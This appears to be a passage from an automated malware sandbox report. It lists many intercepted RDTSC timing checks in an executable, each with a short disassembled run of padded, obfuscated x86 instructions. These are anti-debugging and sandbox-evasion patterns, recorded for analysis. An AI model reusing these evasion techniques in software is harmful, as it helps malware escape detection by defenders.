                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7278C5 second address: 7278CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 728918 second address: 72891C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72891C second address: 728957 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FD0F8E1A7ADh 0x0000000c jmp 00007FD0F8E1A7ACh 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 jmp 00007FD0F8E1A7B3h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 727B3D second address: 727B41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 728957 second address: 72895C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 727B41 second address: 727B50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72895C second address: 7289B9 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FD0F8E1A7A8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b sub dword ptr [ebp+122D2DF6h], esi 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push ecx 0x00000016 call 00007FD0F8E1A7A8h 0x0000001b pop ecx 0x0000001c mov dword ptr [esp+04h], ecx 0x00000020 add dword ptr [esp+04h], 00000015h 0x00000028 inc ecx 0x00000029 push ecx 0x0000002a ret 0x0000002b pop ecx 0x0000002c ret 0x0000002d mov di, cx 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push ebx 0x00000035 call 00007FD0F8E1A7A8h 0x0000003a pop ebx 0x0000003b mov dword ptr [esp+04h], ebx 0x0000003f add dword ptr [esp+04h], 00000016h 0x00000047 inc ebx 0x00000048 push ebx 0x00000049 ret 0x0000004a pop ebx 0x0000004b ret 0x0000004c push eax 0x0000004d push eax 0x0000004e push edx 0x0000004f pushad 0x00000050 pushad 0x00000051 popad 0x00000052 push eax 0x00000053 push edx 0x00000054 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 727B50 second address: 727B55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7289B9 second address: 7289BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 727B55 second address: 727B5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7289BE second address: 7289C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 727B5B second address: 727B5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7289C4 second address: 7289C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 728C02 second address: 728C0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jc 00007FD0F8CDABE6h 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7299DD second address: 7299E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7299E6 second address: 7299F7 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FD0F8CDABE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7299F7 second address: 729A17 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8E1A7B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72B808 second address: 72B882 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 mov dword ptr [esp], eax 0x0000000b add dword ptr [ebp+122D2DF6h], edi 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push esi 0x00000016 call 00007FD0F8CDABE8h 0x0000001b pop esi 0x0000001c mov dword ptr [esp+04h], esi 0x00000020 add dword ptr [esp+04h], 0000001Bh 0x00000028 inc esi 0x00000029 push esi 0x0000002a ret 0x0000002b pop esi 0x0000002c ret 0x0000002d mov edi, dword ptr [ebp+122D2159h] 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push edx 0x00000038 call 00007FD0F8CDABE8h 0x0000003d pop edx 0x0000003e mov dword ptr [esp+04h], edx 0x00000042 add dword ptr [esp+04h], 0000001Ch 0x0000004a inc edx 0x0000004b push edx 0x0000004c ret 0x0000004d pop edx 0x0000004e ret 0x0000004f mov edi, ebx 0x00000051 mov edi, dword ptr [ebp+122D21FBh] 0x00000057 or dword ptr [ebp+122D380Eh], edi 0x0000005d xchg eax, esi 0x0000005e push edi 0x0000005f push eax 0x00000060 push edx 0x00000061 ja 00007FD0F8CDABE6h 0x00000067 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72B882 second address: 72B897 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FD0F8E1A7A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c jbe 00007FD0F8E1A7C3h 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72D7E6 second address: 72D7EB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72CAA7 second address: 72CAB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FD0F8E1A7A6h 0x0000000a popad 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72BAB5 second address: 72BAB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 731A75 second address: 731A9C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD0F8E1A7B0h 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FD0F8E1A7ADh 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 731A9C second address: 731AEE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8CDABF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov dword ptr [ebp+1245F5DAh], edx 0x00000010 push 00000000h 0x00000012 sbb di, EC51h 0x00000017 push 00000000h 0x00000019 mov dword ptr [ebp+1245F5DAh], ecx 0x0000001f xchg eax, esi 0x00000020 pushad 0x00000021 push ebx 0x00000022 push esi 0x00000023 pop esi 0x00000024 pop ebx 0x00000025 push eax 0x00000026 jg 00007FD0F8CDABE6h 0x0000002c pop eax 0x0000002d popad 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007FD0F8CDABF4h 0x00000037 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 731AEE second address: 731AF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72EA97 second address: 72EA9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 735765 second address: 73576C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 739B50 second address: 739B5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FD0F8CDABE6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 739B5F second address: 739B63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73941B second address: 739429 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push esi 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 739429 second address: 73943E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jnc 00007FD0F8E1A7A6h 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push edi 0x00000014 pop edi 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73943E second address: 73944B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73944B second address: 739451 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7395BE second address: 7395C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7395C2 second address: 7395E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD0F8E1A7B1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jng 00007FD0F8E1A7AEh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D4722 second address: 6D473C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 jp 00007FD0F8CDABE6h 0x0000000f jmp 00007FD0F8CDABEBh 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73F57B second address: 73F5A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 ja 00007FD0F8E1A7B4h 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 jns 00007FD0F8E1A7A6h 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73F5A2 second address: 73F5DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8CDABF8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a jo 00007FD0F8CDABE6h 0x00000010 pop ebx 0x00000011 popad 0x00000012 mov eax, dword ptr [eax] 0x00000014 push esi 0x00000015 push eax 0x00000016 push esi 0x00000017 pop esi 0x00000018 pop eax 0x00000019 pop esi 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e push eax 0x0000001f push edx 0x00000020 jc 00007FD0F8CDABE8h 0x00000026 pushad 0x00000027 popad 0x00000028 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73F72C second address: 73F732 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73F732 second address: 73F757 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8CDABF5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b je 00007FD0F8CDAC0Bh 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73F757 second address: 73F75B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73F75B second address: 73F787 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8CDABF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jo 00007FD0F8CDABE6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73F787 second address: 73F78C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73F88E second address: 73F893 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73F893 second address: 73F908 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jng 00007FD0F8E1A7A6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jo 00007FD0F8E1A7B9h 0x00000015 jmp 00007FD0F8E1A7B3h 0x0000001a mov eax, dword ptr [esp+04h] 0x0000001e jg 00007FD0F8E1A7C4h 0x00000024 mov eax, dword ptr [eax] 0x00000026 jmp 00007FD0F8E1A7B5h 0x0000002b mov dword ptr [esp+04h], eax 0x0000002f push eax 0x00000030 push edx 0x00000031 jl 00007FD0F8E1A7ACh 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73F908 second address: 73F90C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73F90C second address: 73F926 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD0F8E1A7B5h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74605C second address: 7460AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FD0F8CDABE6h 0x0000000a jmp 00007FD0F8CDABF4h 0x0000000f popad 0x00000010 jmp 00007FD0F8CDABF6h 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FD0F8CDABF8h 0x0000001f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7460AE second address: 7460BA instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD0F8E1A7A6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 744BED second address: 744BF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 744BF3 second address: 744C03 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8E1A7ACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 744C03 second address: 744C2E instructions: 0x00000000 rdtsc 0x00000002 je 00007FD0F8CDABF2h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push ecx 0x0000000c pushad 0x0000000d popad 0x0000000e je 00007FD0F8CDABE6h 0x00000014 pop ecx 0x00000015 pushad 0x00000016 push eax 0x00000017 pop eax 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 744C2E second address: 744C38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FD0F8E1A7A6h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7454F1 second address: 7454FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7457F7 second address: 74581A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jns 00007FD0F8E1A7BAh 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74581A second address: 745824 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FD0F8CDABE6h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 745986 second address: 74598A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74598A second address: 7459B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8CDABEEh 0x00000007 jmp 00007FD0F8CDABF4h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7459B4 second address: 7459B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7459B8 second address: 7459BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7459BE second address: 7459C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7459C4 second address: 7459E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007FD0F8CDABE6h 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007FD0F8CDABF3h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7459E7 second address: 7459EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7459EB second address: 7459FD instructions: 0x00000000 rdtsc 0x00000002 jg 00007FD0F8CDABE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7459FD second address: 745A15 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FD0F8E1A7A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jns 00007FD0F8E1A7AEh 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 745A15 second address: 745A34 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8CDABF7h 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 745A34 second address: 745A38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 745D0D second address: 745D13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 745E5F second address: 745E63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 745E63 second address: 745E96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FD0F8CDABE6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d jnp 00007FD0F8CDABE6h 0x00000013 ja 00007FD0F8CDABE6h 0x00000019 pop edi 0x0000001a jmp 00007FD0F8CDABF4h 0x0000001f pushad 0x00000020 pushad 0x00000021 popad 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CA35D second address: 6CA361 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71FEDA second address: 700043 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 jnp 00007FD0F8CDABF4h 0x0000000c jmp 00007FD0F8CDABEEh 0x00000011 nop 0x00000012 mov edi, dword ptr [ebp+122D2AA3h] 0x00000018 call dword ptr [ebp+122D2DE6h] 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FD0F8CDABF1h 0x00000025 push esi 0x00000026 push edx 0x00000027 pop edx 0x00000028 push edx 0x00000029 pop edx 0x0000002a pop esi 0x0000002b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72001B second address: 720036 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD0F8E1A7B7h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 720036 second address: 720048 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a ja 00007FD0F8CDABECh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 720409 second address: 720447 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor dword ptr [esp], 72EF5572h 0x0000000f push 00000000h 0x00000011 push eax 0x00000012 call 00007FD0F8E1A7A8h 0x00000017 pop eax 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c add dword ptr [esp+04h], 00000014h 0x00000024 inc eax 0x00000025 push eax 0x00000026 ret 0x00000027 pop eax 0x00000028 ret 0x00000029 call 00007FD0F8E1A7A9h 0x0000002e push eax 0x0000002f push edx 0x00000030 push ecx 0x00000031 ja 00007FD0F8E1A7A6h 0x00000037 pop ecx 0x00000038 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 720447 second address: 72048F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8CDABEAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jbe 00007FD0F8CDABEAh 0x00000010 push eax 0x00000011 pushad 0x00000012 popad 0x00000013 pop eax 0x00000014 mov eax, dword ptr [esp+04h] 0x00000018 jns 00007FD0F8CDABEAh 0x0000001e mov eax, dword ptr [eax] 0x00000020 jl 00007FD0F8CDABF2h 0x00000026 jc 00007FD0F8CDABECh 0x0000002c jno 00007FD0F8CDABE6h 0x00000032 mov dword ptr [esp+04h], eax 0x00000036 pushad 0x00000037 push eax 0x00000038 push edx 0x00000039 jnl 00007FD0F8CDABE6h 0x0000003f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72051B second address: 72051F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72051F second address: 720528 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7208D6 second address: 7208DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7208DC second address: 7208E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 721112 second address: 721117 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 721117 second address: 721168 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jns 00007FD0F8CDABEEh 0x0000000f nop 0x00000010 jl 00007FD0F8CDABEAh 0x00000016 push ecx 0x00000017 pushad 0x00000018 popad 0x00000019 pop edi 0x0000001a lea eax, dword ptr [ebp+12494C5Fh] 0x00000020 push 00000000h 0x00000022 push edx 0x00000023 call 00007FD0F8CDABE8h 0x00000028 pop edx 0x00000029 mov dword ptr [esp+04h], edx 0x0000002d add dword ptr [esp+04h], 00000014h 0x00000035 inc edx 0x00000036 push edx 0x00000037 ret 0x00000038 pop edx 0x00000039 ret 0x0000003a sub edx, 29D034AEh 0x00000040 nop 0x00000041 push eax 0x00000042 push edx 0x00000043 push ebx 0x00000044 push eax 0x00000045 pop eax 